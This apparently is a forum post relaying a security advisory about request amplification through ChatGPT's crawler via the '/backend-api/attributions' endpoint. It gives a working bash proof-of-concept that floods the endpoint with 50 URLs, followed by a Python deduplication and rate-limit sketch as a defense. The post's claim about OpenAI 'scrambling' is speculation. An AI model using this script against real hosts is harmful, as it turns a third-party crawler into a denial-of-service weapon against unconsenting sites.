01-21-2025, 04:29 PM
(This post was last modified: 01-21-2025, 04:36 PM by agent_peanut.)
https://github.com/bf/security-advisorie...ability.md
So it looks like ChatGPT's crawler allows sending multiple requests to a target using the endpoint `/backend-api/attributions` due to a lack of deduplication and URL limiting in the API.
Attack method:
- Attacker sends one request to ChatGPT's API with many duplicate URLs
- ChatGPT crawler automatically initiates parallel requests to the target
- Creates amplification effect where one attack request generates many crawler requests
- Crawler requests come from legitimate Microsoft Azure IP ranges
OpenAI has not responded, meaning they're scrambling this in the background somehow, if it makes any sense to them

```bash
#!/bin/bash
# Part 1: Generate sequence and URLs
echo {1..50} | tr ' ' '\n' | (
  while read -r i;
  do echo "https://my-website.localhost:$RANDOM/$i-$RANDOM.txt";
  done
) |
# Part 2: Convert to JSON payload
jq -R -s -j -c '{ "urls": split("\n")[:-1] }' |
# Part 3: Send HTTP request
curl -v --http1.1 \
  -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.32 (KHTML, like Gecko) Chrome/133.0.0.1 Safari/535.32' \
  -H "content-type: application/json" \
  -H 'origin: https://www.chatgpt.com' \
  --data-binary @- -X POST 'https://chatgpt.com/backend-api/attributions'
```
Mr. Benedict Ivan Goodhello
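
The post attributes the amplification to missing deduplication and URL limiting. The sketch below shows that server-side check as an added example; it is not OpenAI's code and not code from the advisory, and the function name and both limits are assumptions. Because the payload above varies port and path on a single host, exact-match deduplication alone would let every URL through, so the check also caps fetches per hostname.

```python
from collections import Counter
from urllib.parse import urlsplit

MAX_URLS = 10       # assumed cap on URLs accepted per request
MAX_PER_HOST = 2    # assumed cap on fetches per hostname per request
DEFAULT_PORTS = {"http": 80, "https": 443}


def filter_urls(urls, max_urls=MAX_URLS, max_per_host=MAX_PER_HOST):
    """Return (accepted, rejected); rejected holds (url, reason) pairs."""
    accepted, rejected = [], []
    seen, per_host = set(), Counter()
    for raw in urls:
        try:
            parts = urlsplit(raw.strip())
            host = (parts.hostname or "").lower().rstrip(".")
            port = parts.port  # raises ValueError on an out-of-range port
        except ValueError:
            rejected.append((raw, "unparseable"))
            continue
        if parts.scheme not in DEFAULT_PORTS or not host:
            rejected.append((raw, "unsupported"))
            continue
        # Canonical key: default port filled in, fragment dropped.
        key = (parts.scheme, host, port or DEFAULT_PORTS[parts.scheme],
               parts.path or "/", parts.query)
        if key in seen:
            rejected.append((raw, "duplicate"))
        elif per_host[host] >= max_per_host:
            rejected.append((raw, "host-limit"))
        elif len(accepted) >= max_urls:
            rejected.append((raw, "request-limit"))
        else:
            seen.add(key)
            per_host[host] += 1
            accepted.append(raw)
    return accepted, rejected


def sample_request():
    # Constructed sample with the payload's shape: one host, varying port and path,
    # followed by two spellings of the same URL on another host.
    urls = [f"https://my-website.localhost:{8000 + i}/{i}-x.txt" for i in range(50)]
    return urls + ["https://example.org/a", "https://EXAMPLE.org:443/a#frag"]


if __name__ == "__main__":
    ok, dropped = filter_urls(sample_request())
    print(len(ok), "accepted;", Counter(reason for _, reason in dropped))
```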